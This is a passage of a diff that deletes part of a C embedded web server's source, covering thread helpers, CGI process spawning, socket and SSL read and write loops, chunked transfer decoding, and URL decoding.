-		/* TODO: for 1.10: restructure how files in memory are handled */
-
-		return 1;
-	}
-
-	if (0 == stat(path, &st)) {
-		filep->size = (uint64_t)(st.st_size);
-		filep->last_modified = st.st_mtime;
-		filep->is_directory = S_ISDIR(st.st_mode);
-		return 1;
-	}
-
-	return 0;
-}
-
-
-static void
-set_close_on_exec(SOCKET fd, struct mg_connection *conn /* may be null */)
-{
-	if (fcntl(fd, F_SETFD, FD_CLOEXEC) != 0) {
-		if (conn) {
-			mg_cry(conn,
-			       "%s: fcntl(F_SETFD FD_CLOEXEC) failed: %s",
-			       __func__,
-			       strerror(ERRNO));
-		}
-	}
-}
-
-
-int
-mg_start_thread(mg_thread_func_t func, void *param)
-{
-	pthread_t thread_id;
-	pthread_attr_t attr;
-	int result;
-
-	(void)pthread_attr_init(&attr);
-	(void)pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
-
-#if defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1)
-	/* Compile-time option to control stack size,
-	 * e.g. -DUSE_STACK_SIZE=16384 */
-	(void)pthread_attr_setstacksize(&attr, USE_STACK_SIZE);
-#endif /* defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1) */
-
-	result = pthread_create(&thread_id, &attr, func, param);
-	pthread_attr_destroy(&attr);
-
-	return result;
-}
-
-
-/* Start a thread storing the thread context. */
-static int
-mg_start_thread_with_id(mg_thread_func_t func,
-                        void *param,
-                        pthread_t *threadidptr)
-{
-	pthread_t thread_id;
-	pthread_attr_t attr;
-	int result;
-
-	(void)pthread_attr_init(&attr);
-
-#if defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1)
-	/* Compile-time option to control stack size,
-	 * e.g. -DUSE_STACK_SIZE=16384 */
-	(void)pthread_attr_setstacksize(&attr, USE_STACK_SIZE);
-#endif /* defined(USE_STACK_SIZE) && USE_STACK_SIZE > 1 */
-
-	result = pthread_create(&thread_id, &attr, func, param);
-	pthread_attr_destroy(&attr);
-	if ((result == 0) && (threadidptr != NULL)) {
-		*threadidptr = thread_id;
-	}
-	return result;
-}
-
-
-/* Wait for a thread to finish. */
-static int
-mg_join_thread(pthread_t threadid)
-{
-	int result;
-
-	result = pthread_join(threadid, NULL);
-	return result;
-}
-
-
-#ifndef NO_CGI
-static pid_t
-spawn_process(struct mg_connection *conn,
-              const char *prog,
-              char *envblk,
-              char *envp[],
-              int fdin[2],
-              int fdout[2],
-              int fderr[2],
-              const char *dir)
-{
-	pid_t pid;
-	const char *interp;
-
-	(void)envblk;
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	if ((pid = fork()) == -1) {
-		/* Parent */
-		mg_send_http_error(conn,
-		                   500,
-		                   "Error: Creating CGI process\nfork(): %s",
-		                   strerror(ERRNO));
-	} else if (pid == 0) {
-		/* Child */
-		if (chdir(dir) != 0) {
-			mg_cry(conn, "%s: chdir(%s): %s", __func__, dir, strerror(ERRNO));
-		} else if (dup2(fdin[0], 0) == -1) {
-			mg_cry(conn,
-			       "%s: dup2(%d, 0): %s",
-			       __func__,
-			       fdin[0],
-			       strerror(ERRNO));
-		} else if (dup2(fdout[1], 1) == -1) {
-			mg_cry(conn,
-			       "%s: dup2(%d, 1): %s",
-			       __func__,
-			       fdout[1],
-			       strerror(ERRNO));
-		} else if (dup2(fderr[1], 2) == -1) {
-			mg_cry(conn,
-			       "%s: dup2(%d, 2): %s",
-			       __func__,
-			       fderr[1],
-			       strerror(ERRNO));
-		} else {
-			/* Keep stderr and stdout in two different pipes.
-			 * Stdout will be sent back to the client,
-			 * stderr should go into a server error log. */
-			(void)close(fdin[0]);
-			(void)close(fdout[1]);
-			(void)close(fderr[1]);
-
-			/* Close write end fdin and read end fdout and fderr */
-			(void)close(fdin[1]);
-			(void)close(fdout[0]);
-			(void)close(fderr[0]);
-
-			/* After exec, all signal handlers are restored to their default
-			 * values, with one exception of SIGCHLD. According to
-			 * POSIX.1-2001 and Linux's implementation, SIGCHLD's handler will
-			 * leave unchanged after exec if it was set to be ignored. Restore
-			 * it to default action. */
-			signal(SIGCHLD, SIG_DFL);
-
-			interp = conn->ctx->config[CGI_INTERPRETER];
-			if (interp == NULL) {
-				(void)execle(prog, prog, NULL, envp);
-				mg_cry(conn,
-				       "%s: execle(%s): %s",
-				       __func__,
-				       prog,
-				       strerror(ERRNO));
-			} else {
-				(void)execle(interp, interp, prog, NULL, envp);
-				mg_cry(conn,
-				       "%s: execle(%s %s): %s",
-				       __func__,
-				       interp,
-				       prog,
-				       strerror(ERRNO));
-			}
-		}
-		exit(EXIT_FAILURE);
-	}
-
-	return pid;
-}
-#endif /* !NO_CGI */
-
-
-static int
-set_non_blocking_mode(SOCKET sock)
-{
-	int flags = fcntl(sock, F_GETFL, 0);
-	if (flags < 0) {
-		return -1;
-	}
-
-	if (fcntl(sock, F_SETFL, (flags | O_NONBLOCK)) < 0) {
-		return -1;
-	}
-	return 0;
-}
-
-static int
-set_blocking_mode(SOCKET sock)
-{
-	int flags = fcntl(sock, F_GETFL, 0);
-	if (flags < 0) {
-		return -1;
-	}
-
-	if (fcntl(sock, F_SETFL, flags & (~(int)(O_NONBLOCK))) < 0) {
-		return -1;
-	}
-	return 0;
-}
-#endif /* _WIN32 / else */
-
-/* End of initial operating system specific define block. */
-
-
-/* Get a random number (independent of C rand function) */
-static uint64_t
-get_random(void)
-{
-	static uint64_t lfsr = 0; /* Linear feedback shift register */
-	static uint64_t lcg = 0;  /* Linear congruential generator */
-	uint64_t now = mg_get_current_time_ns();
-
-	if (lfsr == 0) {
-		/* lfsr will be only 0 if has not been initialized,
-		 * so this code is called only once. */
-		lfsr = mg_get_current_time_ns();
-		lcg = mg_get_current_time_ns();
-	} else {
-		/* Get the next step of both random number generators. */
-		lfsr = (lfsr >> 1)
-		       | ((((lfsr >> 0) ^ (lfsr >> 1) ^ (lfsr >> 3) ^ (lfsr >> 4)) & 1)
-		          << 63);
-		lcg = lcg * 6364136223846793005LL + 1442695040888963407LL;
-	}
-
-	/* Combining two pseudo-random number generators and a high resolution
-	 * part
-	 * of the current server time will make it hard (impossible?) to guess
-	 * the
-	 * next number. */
-	return (lfsr ^ lcg ^ now);
-}
-
-
-static int
-mg_poll(struct pollfd *pfd,
-        unsigned int n,
-        int milliseconds,
-        volatile int *stop_server)
-{
-	/* Call poll, but only for a maximum time of a few seconds.
-	 * This will allow to stop the server after some seconds, instead
-	 * of having to wait for a long socket timeout. */
-	int ms_now = SOCKET_TIMEOUT_QUANTUM; /* Sleep quantum in ms */
-
-	do {
-		int result;
-
-		if (*stop_server) {
-			/* Shut down signal */
-			return -2;
-		}
-
-		if ((milliseconds >= 0) && (milliseconds < ms_now)) {
-			ms_now = milliseconds;
-		}
-
-		result = poll(pfd, n, ms_now);
-		if (result != 0) {
-			/* Poll returned either success (1) or error (-1).
-			 * Forward both to the caller. */
-			return result;
-		}
-
-		/* Poll returned timeout (0). */
-		if (milliseconds > 0) {
-			milliseconds -= ms_now;
-		}
-
-	} while (milliseconds != 0);
-
-	/* timeout: return 0 */
-	return 0;
-}
-
-
-/* Write data to the IO channel - opened file descriptor, socket or SSL
- * descriptor.
- * Return value:
- *  >=0 .. number of bytes successfully written
- *   -1 .. timeout
- *   -2 .. error
- */
-static int
-push_inner(struct mg_context *ctx,
-           FILE *fp,
-           SOCKET sock,
-           SSL *ssl,
-           const char *buf,
-           int len,
-           double timeout)
-{
-	uint64_t start = 0, now = 0, timeout_ns = 0;
-	int n, err;
-	unsigned ms_wait = SOCKET_TIMEOUT_QUANTUM; /* Sleep quantum in ms */
-
-#ifdef _WIN32
-	typedef int len_t;
-#else
-	typedef size_t len_t;
-#endif
-
-	if (timeout > 0) {
-		now = mg_get_current_time_ns();
-		start = now;
-		timeout_ns = (uint64_t)(timeout * 1.0E9);
-	}
-
-	if (ctx == NULL) {
-		return -2;
-	}
-
-#ifdef NO_SSL
-	if (ssl) {
-		return -2;
-	}
-#endif
-
-	/* Try to read until it succeeds, fails, times out, or the server
-	 * shuts down. */
-	for (;;) {
-
-#ifndef NO_SSL
-		if (ssl != NULL) {
-			n = SSL_write(ssl, buf, len);
-			if (n <= 0) {
-				err = SSL_get_error(ssl, n);
-				if ((err == SSL_ERROR_SYSCALL) && (n == -1)) {
-					err = ERRNO;
-				} else if ((err == SSL_ERROR_WANT_READ)
-				           || (err == SSL_ERROR_WANT_WRITE)) {
-					n = 0;
-				} else {
-					DEBUG_TRACE("SSL_write() failed, error %d", err);
-					return -2;
-				}
-			} else {
-				err = 0;
-			}
-		} else
-#endif
-		    if (fp != NULL) {
-			n = (int)fwrite(buf, 1, (size_t)len, fp);
-			if (ferror(fp)) {
-				n = -1;
-				err = ERRNO;
-			} else {
-				err = 0;
-			}
-		} else {
-			n = (int)send(sock, buf, (len_t)len, MSG_NOSIGNAL);
-			err = (n < 0) ? ERRNO : 0;
-#ifdef _WIN32
-			if (err == WSAEWOULDBLOCK) {
-				err = 0;
-				n = 0;
-			}
-#else
-			if (err == EWOULDBLOCK) {
-				err = 0;
-				n = 0;
-			}
-#endif
-			if (n < 0) {
-				/* shutdown of the socket at client side */
-				return -2;
-			}
-		}
-
-		if (ctx->stop_flag) {
-			return -2;
-		}
-
-		if ((n > 0) || ((n == 0) && (len == 0))) {
-			/* some data has been read, or no data was requested */
-			return n;
-		}
-		if (n < 0) {
-			/* socket error - check errno */
-			DEBUG_TRACE("send() failed, error %d", err);
-
-			/* TODO (mid): error handling depending on the error code.
-			 * These codes are different between Windows and Linux.
-			 * Currently there is no problem with failing send calls,
-			 * if there is a reproducible situation, it should be
-			 * investigated in detail.
-			 */
-			return -2;
-		}
-
-		/* Only in case n=0 (timeout), repeat calling the write function */
-
-		/* If send failed, wait before retry */
-		if (fp != NULL) {
-			/* For files, just wait a fixed time,
-			 * maybe an average disk seek time. */
-			mg_sleep(ms_wait > 10 ? 10 : ms_wait);
-		} else {
-			/* For sockets, wait for the socket using select */
-			fd_set wfds;
-			struct timeval tv;
-			int sret;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* GCC seems to have a flaw with it's own socket macros:
- * http://www.linuxquestions.org/questions/programming-9/impossible-to-use-gcc-with-wconversion-and-standard-socket-macros-841935/
- */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wsign-conversion"
-#endif
-
-			FD_ZERO(&wfds);
-			FD_SET(sock, &wfds);
-			tv.tv_sec = (time_t)(ms_wait / 1000);
-			tv.tv_usec = (long)((ms_wait % 1000) * 1000);
-
-			sret = select((int)sock + 1, NULL, &wfds, NULL, &tv);
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#pragma GCC diagnostic pop
-#endif
-
-			if (sret > 0) {
-				/* We got ready to write. Don't check the timeout
-				 * but directly go back to write again. */
-				continue;
-			}
-		}
-
-		if (timeout > 0) {
-			now = mg_get_current_time_ns();
-			if ((now - start) > timeout_ns) {
-				/* Timeout */
-				break;
-			}
-		}
-	}
-
-	(void)err; /* Avoid unused warning if NO_SSL is set and DEBUG_TRACE is not
-	              used */
-
-	return -1;
-}
-
-
-static int64_t
-push_all(struct mg_context *ctx,
-         FILE *fp,
-         SOCKET sock,
-         SSL *ssl,
-         const char *buf,
-         int64_t len)
-{
-	double timeout = -1.0;
-	int64_t n, nwritten = 0;
-
-	if (ctx == NULL) {
-		return -1;
-	}
-
-	if (ctx->config[REQUEST_TIMEOUT]) {
-		timeout = atoi(ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-
-	while ((len > 0) && (ctx->stop_flag == 0)) {
-		n = push_inner(ctx, fp, sock, ssl, buf + nwritten, (int)len, timeout);
-		if (n < 0) {
-			if (nwritten == 0) {
-				nwritten = n; /* Propagate the error */
-			}
-			break;
-		} else if (n == 0) {
-			break; /* No more data to write */
-		} else {
-			nwritten += n;
-			len -= n;
-		}
-	}
-
-	return nwritten;
-}
-
-
-/* Read from IO channel - opened file descriptor, socket, or SSL descriptor.
- * Return value:
- *  >=0 .. number of bytes successfully read
- *   -1 .. timeout
- *   -2 .. error
- */
-static int
-pull_inner(FILE *fp,
-           struct mg_connection *conn,
-           char *buf,
-           int len,
-           double timeout)
-{
-	int nread, err = 0;
-
-#ifdef _WIN32
-	typedef int len_t;
-#else
-	typedef size_t len_t;
-#endif
-#ifndef NO_SSL
-	int ssl_pending;
-#endif
-
-	/* We need an additional wait loop around this, because in some cases
-	 * with TLSwe may get data from the socket but not from SSL_read.
-	 * In this case we need to repeat at least once.
-	 */
-
-	if (fp != NULL) {
-#if !defined(_WIN32_WCE)
-		/* Use read() instead of fread(), because if we're reading from the
-		 * CGI pipe, fread() may block until IO buffer is filled up. We
-		 * cannot afford to block and must pass all read bytes immediately
-		 * to the client. */
-		nread = (int)read(fileno(fp), buf, (size_t)len);
-#else
-		/* WinCE does not support CGI pipes */
-		nread = (int)fread(buf, 1, (size_t)len, fp);
-#endif
-		err = (nread < 0) ? ERRNO : 0;
-		if ((nread == 0) && (len > 0)) {
-			/* Should get data, but got EOL */
-			return -2;
-		}
-
-#ifndef NO_SSL
-	} else if ((conn->ssl != NULL)
-	           && ((ssl_pending = SSL_pending(conn->ssl)) > 0)) {
-		/* We already know there is no more data buffered in conn->buf
-		 * but there is more available in the SSL layer. So don't poll
-		 * conn->client.sock yet. */
-		if (ssl_pending > len) {
-			ssl_pending = len;
-		}
-		nread = SSL_read(conn->ssl, buf, ssl_pending);
-		if (nread <= 0) {
-			err = SSL_get_error(conn->ssl, nread);
-			if ((err == SSL_ERROR_SYSCALL) && (nread == -1)) {
-				err = ERRNO;
-			} else if ((err == SSL_ERROR_WANT_READ)
-			           || (err == SSL_ERROR_WANT_WRITE)) {
-				nread = 0;
-			} else {
-				DEBUG_TRACE("SSL_read() failed, error %d", err);
-				return -1;
-			}
-		} else {
-			err = 0;
-		}
-
-	} else if (conn->ssl != NULL) {
-
-		struct pollfd pfd[1];
-		int pollres;
-
-		pfd[0].fd = conn->client.sock;
-		pfd[0].events = POLLIN;
-		pollres =
-		    mg_poll(pfd, 1, (int)(timeout * 1000.0), &(conn->ctx->stop_flag));
-		if (conn->ctx->stop_flag) {
-			return -2;
-		}
-		if (pollres > 0) {
-			nread = SSL_read(conn->ssl, buf, len);
-			if (nread <= 0) {
-				err = SSL_get_error(conn->ssl, nread);
-				if ((err == SSL_ERROR_SYSCALL) && (nread == -1)) {
-					err = ERRNO;
-				} else if ((err == SSL_ERROR_WANT_READ)
-				           || (err == SSL_ERROR_WANT_WRITE)) {
-					nread = 0;
-				} else {
-					DEBUG_TRACE("SSL_read() failed, error %d", err);
-					return -2;
-				}
-			} else {
-				err = 0;
-			}
-
-		} else if (pollres < 0) {
-			/* Error */
-			return -2;
-		} else {
-			/* pollres = 0 means timeout */
-			nread = 0;
-		}
-#endif
-
-	} else {
-		struct pollfd pfd[1];
-		int pollres;
-
-		pfd[0].fd = conn->client.sock;
-		pfd[0].events = POLLIN;
-		pollres =
-		    mg_poll(pfd, 1, (int)(timeout * 1000.0), &(conn->ctx->stop_flag));
-		if (conn->ctx->stop_flag) {
-			return -2;
-		}
-		if (pollres > 0) {
-			nread = (int)recv(conn->client.sock, buf, (len_t)len, 0);
-			err = (nread < 0) ? ERRNO : 0;
-			if (nread <= 0) {
-				/* shutdown of the socket at client side */
-				return -2;
-			}
-		} else if (pollres < 0) {
-			/* error callint poll */
-			return -2;
-		} else {
-			/* pollres = 0 means timeout */
-			nread = 0;
-		}
-	}
-
-	if (conn->ctx->stop_flag) {
-		return -2;
-	}
-
-	if ((nread > 0) || ((nread == 0) && (len == 0))) {
-		/* some data has been read, or no data was requested */
-		return nread;
-	}
-
-	if (nread < 0) {
-/* socket error - check errno */
-#ifdef _WIN32
-		if (err == WSAEWOULDBLOCK) {
-			/* TODO (low): check if this is still required */
-			/* standard case if called from close_socket_gracefully */
-			return -2;
-		} else if (err == WSAETIMEDOUT) {
-			/* TODO (low): check if this is still required */
-			/* timeout is handled by the while loop  */
-			return 0;
-		} else if (err == WSAECONNABORTED) {
-			/* See https://www.chilkatsoft.com/p/p_299.asp */
-			return -2;
-		} else {
-			DEBUG_TRACE("recv() failed, error %d", err);
-			return -2;
-		}
-#else
-		/* TODO: POSIX returns either EAGAIN or EWOULDBLOCK in both cases,
-		 * if the timeout is reached and if the socket was set to non-
-		 * blocking in close_socket_gracefully, so we can not distinguish
-		 * here. We have to wait for the timeout in both cases for now.
-		 */
-		if ((err == EAGAIN) || (err == EWOULDBLOCK) || (err == EINTR)) {
-			/* TODO (low): check if this is still required */
-			/* EAGAIN/EWOULDBLOCK:
-			 * standard case if called from close_socket_gracefully
-			 * => should return -1 */
-			/* or timeout occured
-			 * => the code must stay in the while loop */
-
-			/* EINTR can be generated on a socket with a timeout set even
-			 * when SA_RESTART is effective for all relevant signals
-			 * (see signal(7)).
-			 * => stay in the while loop */
-		} else {
-			DEBUG_TRACE("recv() failed, error %d", err);
-			return -2;
-		}
-#endif
-	}
-
-	/* Timeout occured, but no data available. */
-	return -1;
-}
-
-
-static int
-pull_all(FILE *fp, struct mg_connection *conn, char *buf, int len)
-{
-	int n, nread = 0;
-	double timeout = -1.0;
-	uint64_t start_time = 0, now = 0, timeout_ns = 0;
-
-	if (conn->ctx->config[REQUEST_TIMEOUT]) {
-		timeout = atoi(conn->ctx->config[REQUEST_TIMEOUT]) / 1000.0;
-	}
-	if (timeout >= 0.0) {
-		start_time = mg_get_current_time_ns();
-		timeout_ns = (uint64_t)(timeout * 1.0E9);
-	}
-
-	while ((len > 0) && (conn->ctx->stop_flag == 0)) {
-		n = pull_inner(fp, conn, buf + nread, len, timeout);
-		if (n == -2) {
-			if (nread == 0) {
-				nread = -1; /* Propagate the error */
-			}
-			break;
-		} else if (n == -1) {
-			/* timeout */
-			if (timeout >= 0.0) {
-				now = mg_get_current_time_ns();
-				if ((now - start_time) <= timeout_ns) {
-					continue;
-				}
-			}
-			break;
-		} else if (n == 0) {
-			break; /* No more data to read */
-		} else {
-			conn->consumed_content += n;
-			nread += n;
-			len -= n;
-		}
-	}
-
-	return nread;
-}
-
-
-static void
-discard_unread_request_data(struct mg_connection *conn)
-{
-	char buf[MG_BUF_LEN];
-	size_t to_read;
-	int nread;
-
-	if (conn == NULL) {
-		return;
-	}
-
-	to_read = sizeof(buf);
-
-	if (conn->is_chunked) {
-		/* Chunked encoding: 3=chunk read completely
-		 * completely */
-		while (conn->is_chunked != 3) {
-			nread = mg_read(conn, buf, to_read);
-			if (nread <= 0) {
-				break;
-			}
-		}
-
-	} else {
-		/* Not chunked: content length is known */
-		while (conn->consumed_content < conn->content_len) {
-			if (to_read
-			    > (size_t)(conn->content_len - conn->consumed_content)) {
-				to_read = (size_t)(conn->content_len - conn->consumed_content);
-			}
-
-			nread = mg_read(conn, buf, to_read);
-			if (nread <= 0) {
-				break;
-			}
-		}
-	}
-}
-
-
-static int
-mg_read_inner(struct mg_connection *conn, void *buf, size_t len)
-{
-	int64_t n, buffered_len, nread;
-	int64_t len64 =
-	    (int64_t)((len > INT_MAX) ? INT_MAX : len); /* since the return value is
-	                                               * int, we may not read more
-	                                               * bytes */
-	const char *body;
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	/* If Content-Length is not set for a request with body data
-	 * (e.g., a PUT or POST request), we do not know in advance
-	 * how much data should be read. */
-	if (conn->consumed_content == 0) {
-		if (conn->is_chunked == 1) {
-			conn->content_len = len64;
-			conn->is_chunked = 2;
-		} else if (conn->content_len == -1) {
-			/* The body data is completed when the connection
-			 * is closed. */
-			conn->content_len = INT64_MAX;
-			conn->must_close = 1;
-		}
-	}
-
-	nread = 0;
-	if (conn->consumed_content < conn->content_len) {
-		/* Adjust number of bytes to read. */
-		int64_t left_to_read = conn->content_len - conn->consumed_content;
-		if (left_to_read < len64) {
-			/* Do not read more than the total content length of the
-			 * request.
-			 */
-			len64 = left_to_read;
-		}
-
-		/* Return buffered data */
-		buffered_len = (int64_t)(conn->data_len) - (int64_t)conn->request_len
-		               - conn->consumed_content;
-		if (buffered_len > 0) {
-			if (len64 < buffered_len) {
-				buffered_len = len64;
-			}
-			body = conn->buf + conn->request_len + conn->consumed_content;
-			memcpy(buf, body, (size_t)buffered_len);
-			len64 -= buffered_len;
-			conn->consumed_content += buffered_len;
-			nread += buffered_len;
-			buf = (char *)buf + buffered_len;
-		}
-
-		/* We have returned all buffered data. Read new data from the remote
-		 * socket.
-		 */
-		if ((n = pull_all(NULL, conn, (char *)buf, (int)len64)) >= 0) {
-			nread += n;
-		} else {
-			nread = ((nread > 0) ? nread : n);
-		}
-	}
-	return (int)nread;
-}
-
-
-static char
-mg_getc(struct mg_connection *conn)
-{
-	char c;
-	if (conn == NULL) {
-		return 0;
-	}
-	if (mg_read_inner(conn, &c, 1) <= 0) {
-		return (char)0;
-	}
-	return c;
-}
-
-
-int
-mg_read(struct mg_connection *conn, void *buf, size_t len)
-{
-	if (len > INT_MAX) {
-		len = INT_MAX;
-	}
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	if (conn->is_chunked) {
-		size_t all_read = 0;
-
-		while (len > 0) {
-			if (conn->is_chunked == 3) {
-				/* No more data left to read */
-				return 0;
-			}
-
-			if (conn->chunk_remainder) {
-				/* copy from the remainder of the last received chunk */
-				long read_ret;
-				size_t read_now =
-				    ((conn->chunk_remainder > len) ? (len)
-				                                   : (conn->chunk_remainder));
-
-				conn->content_len += (int)read_now;
-				read_ret =
-				    mg_read_inner(conn, (char *)buf + all_read, read_now);
-
-				if (read_ret < 1) {
-					/* read error */
-					return -1;
-				}
-
-				all_read += (size_t)read_ret;
-				conn->chunk_remainder -= (size_t)read_ret;
-				len -= (size_t)read_ret;
-
-				if (conn->chunk_remainder == 0) {
-					/* Add data bytes in the current chunk have been read,
-					 * so we are expecting \r\n now. */
-					char x1, x2;
-					conn->content_len += 2;
-					x1 = mg_getc(conn);
-					x2 = mg_getc(conn);
-					if ((x1 != '\r') || (x2 != '\n')) {
-						/* Protocol violation */
-						return -1;
-					}
-				}
-
-			} else {
-				/* fetch a new chunk */
-				int i = 0;
-				char lenbuf[64];
-				char *end = 0;
-				unsigned long chunkSize = 0;
-
-				for (i = 0; i < ((int)sizeof(lenbuf) - 1); i++) {
-					conn->content_len++;
-					lenbuf[i] = mg_getc(conn);
-					if ((i > 0) && (lenbuf[i] == '\r')
-					    && (lenbuf[i - 1] != '\r')) {
-						continue;
-					}
-					if ((i > 1) && (lenbuf[i] == '\n')
-					    && (lenbuf[i - 1] == '\r')) {
-						lenbuf[i + 1] = 0;
-						chunkSize = strtoul(lenbuf, &end, 16);
-						if (chunkSize == 0) {
-							/* regular end of content */
-							conn->is_chunked = 3;
-						}
-						break;
-					}
-					if (!isxdigit(lenbuf[i])) {
-						/* illegal character for chunk length */
-						return -1;
-					}
-				}
-				if ((end == NULL) || (*end != '\r')) {
-					/* chunksize not set correctly */
-					return -1;
-				}
-				if (chunkSize == 0) {
-					break;
-				}
-
-				conn->chunk_remainder = chunkSize;
-			}
-		}
-
-		return (int)all_read;
-	}
-	return mg_read_inner(conn, buf, len);
-}
-
-
-int
-mg_write(struct mg_connection *conn, const void *buf, size_t len)
-{
-	time_t now;
-	int64_t n, total, allowed;
-
-	if (conn == NULL) {
-		return 0;
-	}
-
-	if (conn->throttle > 0) {
-		if ((now = time(NULL)) != conn->last_throttle_time) {
-			conn->last_throttle_time = now;
-			conn->last_throttle_bytes = 0;
-		}
-		allowed = conn->throttle - conn->last_throttle_bytes;
-		if (allowed > (int64_t)len) {
-			allowed = (int64_t)len;
-		}
-		if ((total = push_all(conn->ctx,
-		                      NULL,
-		                      conn->client.sock,
-		                      conn->ssl,
-		                      (const char *)buf,
-		                      (int64_t)allowed)) == allowed) {
-			buf = (const char *)buf + total;
-			conn->last_throttle_bytes += total;
-			while ((total < (int64_t)len) && (conn->ctx->stop_flag == 0)) {
-				allowed = (conn->throttle > ((int64_t)len - total))
-				              ? (int64_t)len - total
-				              : conn->throttle;
-				if ((n = push_all(conn->ctx,
-				                  NULL,
-				                  conn->client.sock,
-				                  conn->ssl,
-				                  (const char *)buf,
-				                  (int64_t)allowed)) != allowed) {
-					break;
-				}
-				sleep(1);
-				conn->last_throttle_bytes = allowed;
-				conn->last_throttle_time = time(NULL);
-				buf = (const char *)buf + n;
-				total += n;
-			}
-		}
-	} else {
-		total = push_all(conn->ctx,
-		                 NULL,
-		                 conn->client.sock,
-		                 conn->ssl,
-		                 (const char *)buf,
-		                 (int64_t)len);
-	}
-	if (total > 0) {
-		conn->num_bytes_sent += total;
-	}
-	return (int)total;
-}
-
-
-/* Send a chunk, if "Transfer-Encoding: chunked" is used */
-int
-mg_send_chunk(struct mg_connection *conn,
-              const char *chunk,
-              unsigned int chunk_len)
-{
-	char lenbuf[16];
-	size_t lenbuf_len;
-	int ret;
-	int t;
-
-	/* First store the length information in a text buffer. */
-	sprintf(lenbuf, "%x\r\n", chunk_len);
-	lenbuf_len = strlen(lenbuf);
-
-	/* Then send length information, chunk and terminating \r\n. */
-	ret = mg_write(conn, lenbuf, lenbuf_len);
-	if (ret != (int)lenbuf_len) {
-		return -1;
-	}
-	t = ret;
-
-	ret = mg_write(conn, chunk, chunk_len);
-	if (ret != (int)chunk_len) {
-		return -1;
-	}
-	t += ret;
-
-	ret = mg_write(conn, "\r\n", 2);
-	if (ret != 2) {
-		return -1;
-	}
-	t += ret;
-
-	return t;
-}
-
-
-/* Alternative alloc_vprintf() for non-compliant C runtimes */
-static int
-alloc_vprintf2(char **buf, const char *fmt, va_list ap)
-{
-	va_list ap_copy;
-	size_t size = MG_BUF_LEN / 4;
-	int len = -1;
-
-	*buf = NULL;
-	while (len < 0) {
-		if (*buf) {
-			mg_free(*buf);
-		}
-
-		size *= 4;
-		*buf = (char *)mg_malloc(size);
-		if (!*buf) {
-			break;
-		}
-
-		va_copy(ap_copy, ap);
-		len = vsnprintf_impl(*buf, size - 1, fmt, ap_copy);
-		va_end(ap_copy);
-		(*buf)[size - 1] = 0;
-	}
-
-	return len;
-}
-
-
-/* Print message to buffer. If buffer is large enough to hold the message,
- * return buffer. If buffer is to small, allocate large enough buffer on
- * heap,
- * and return allocated buffer. */
-static int
-alloc_vprintf(char **out_buf,
-              char *prealloc_buf,
-              size_t prealloc_size,
-              const char *fmt,
-              va_list ap)
-{
-	va_list ap_copy;
-	int len;
-
-	/* Windows is not standard-compliant, and vsnprintf() returns -1 if
-	 * buffer is too small. Also, older versions of msvcrt.dll do not have
-	 * _vscprintf().  However, if size is 0, vsnprintf() behaves correctly.
-	 * Therefore, we make two passes: on first pass, get required message
-	 * length.
-	 * On second pass, actually print the message. */
-	va_copy(ap_copy, ap);
-	len = vsnprintf_impl(NULL, 0, fmt, ap_copy);
-	va_end(ap_copy);
-
-	if (len < 0) {
-		/* C runtime is not standard compliant, vsnprintf() returned -1.
-		 * Switch to alternative code path that uses incremental
-		 * allocations.
-		*/
-		va_copy(ap_copy, ap);
-		len = alloc_vprintf2(out_buf, fmt, ap_copy);
-		va_end(ap_copy);
-
-	} else if ((size_t)(len) >= prealloc_size) {
-		/* The pre-allocated buffer not large enough. */
-		/* Allocate a new buffer. */
-		*out_buf = (char *)mg_malloc((size_t)(len) + 1);
-		if (!*out_buf) {
-			/* Allocation failed. Return -1 as "out of memory" error. */
-			return -1;
-		}
-		/* Buffer allocation successful. Store the string there. */
-		va_copy(ap_copy, ap);
-		IGNORE_UNUSED_RESULT(
-		    vsnprintf_impl(*out_buf, (size_t)(len) + 1, fmt, ap_copy));
-		va_end(ap_copy);
-
-	} else {
-		/* The pre-allocated buffer is large enough.
-		 * Use it to store the string and return the address. */
-		va_copy(ap_copy, ap);
-		IGNORE_UNUSED_RESULT(
-		    vsnprintf_impl(prealloc_buf, prealloc_size, fmt, ap_copy));
-		va_end(ap_copy);
-		*out_buf = prealloc_buf;
-	}
-
-	return len;
-}
-
-
-static int
-mg_vprintf(struct mg_connection *conn, const char *fmt, va_list ap)
-{
-	char mem[MG_BUF_LEN];
-	char *buf = NULL;
-	int len;
-
-	if ((len = alloc_vprintf(&buf, mem, sizeof(mem), fmt, ap)) > 0) {
-		len = mg_write(conn, buf, (size_t)len);
-	}
-	if ((buf != mem) && (buf != NULL)) {
-		mg_free(buf);
-	}
-
-	return len;
-}
-
-
-int
-mg_printf(struct mg_connection *conn, const char *fmt, ...)
-{
-	va_list ap;
-	int result;
-
-	va_start(ap, fmt);
-	result = mg_vprintf(conn, fmt, ap);
-	va_end(ap);
-
-	return result;
-}
-
-
-int
-mg_url_decode(const char *src,
-              int src_len,
-              char *dst,
-              int dst_len,
-              int is_form_url_encoded)
-{
-	int i, j, a, b;
-#define HEXTOI(x) (isdigit(x) ? (x - '0') : (x - 'W'))
-
-	for (i = j = 0; (i < src_len) && (j < (dst_len - 1)); i++, j++) {
-		if ((i < src_len - 2) && (src[i] == '%')
-		    && isxdigit(*(const unsigned char *)(src + i + 1))
-		    && isxdigit(*(const unsigned char *)(src + i + 2))) {
-			a = tolower(*(const unsigned char *)(src + i + 1));
-			b = tolower(*(const unsigned char *)(src + i + 2));
-			dst[j] = (char)((HEXTOI(a) << 4) | HEXTOI(b));
-			i += 2;
-		} else if (is_form_url_encoded && (src[i] == '+')) {
-			dst[j] = ' ';
-		} else {
-			dst[j] = src[i];
-		}
-	}
-
-	dst[j] = '\0'; /* Null-terminate the destination */
-
-	return (i >= src_len) ? j : -1;
-}
-
-
-int
-mg_get_var(const char *data,
-           size_t data_len,
-           const char *name,
-           char *dst,
-           size_t dst_len)
-{
-	return mg_get_var2(data, data_len, name, dst, dst_len, 0);
-}
-
-
-int
-mg_get_var2(const char *data,
-            size_t data_len,
-            const char *name,
-            char *dst,
-            size_t dst_len,
-            size_t occurrence)
-{
